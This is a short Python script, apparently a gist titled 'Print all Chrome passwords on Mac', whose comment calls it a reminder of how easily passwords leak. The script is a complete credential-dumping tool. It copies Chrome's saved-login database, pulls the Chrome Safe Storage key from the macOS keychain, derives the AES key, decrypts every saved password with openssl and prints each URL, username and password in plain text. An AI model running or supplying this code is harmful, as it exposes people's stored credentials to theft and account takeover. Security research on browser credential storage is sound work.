Print all Chrome passwords on Mac

print-passwords.py

# A little reminder that we're just one message prompt away from leaking all our passwords to the unknown.
import os
import sqlite3
import subprocess
import base64
import binascii
import hashlib
os.system('cp ~/Library/"Application Support"/Google/Chrome/Default/"Login Data" /tmp/chrome_login.db')
safe_storage_key = subprocess.check_output("security find-generic-password -ga 'Chrome' -w", shell=True).decode().strip()
key = hashlib.pbkdf2_hmac('sha1', safe_storage_key.encode(), b'saltysalt', 1003)[:16]
hex_key = binascii.hexlify(key).decode()
conn = sqlite3.connect('/tmp/chrome_login.db')
cursor = conn.cursor()
cursor.execute('SELECT origin_url, username_value, password_value FROM logins')
for url, username, encrypted_pass in cursor.fetchall():
    if len(encrypted_pass) > 0:
        if encrypted_pass.startswith(b'v10'):
            encrypted_value = base64.b64encode(encrypted_pass[3:]).decode()
            try:
                iv = ''.join(('20',) * 16)
                cmd = f"openssl enc -base64 -d -aes-128-cbc -iv '{iv}' -K {hex_key} <<< {encrypted_value} 2>/dev/null"
                decrypted = subprocess.check_output(cmd, shell=True).decode().strip()
                print(f"{url} | {username} | {decrypted}")
            except:
                pass
cursor.close()
conn.close()
os.remove('/tmp/chrome_login.db')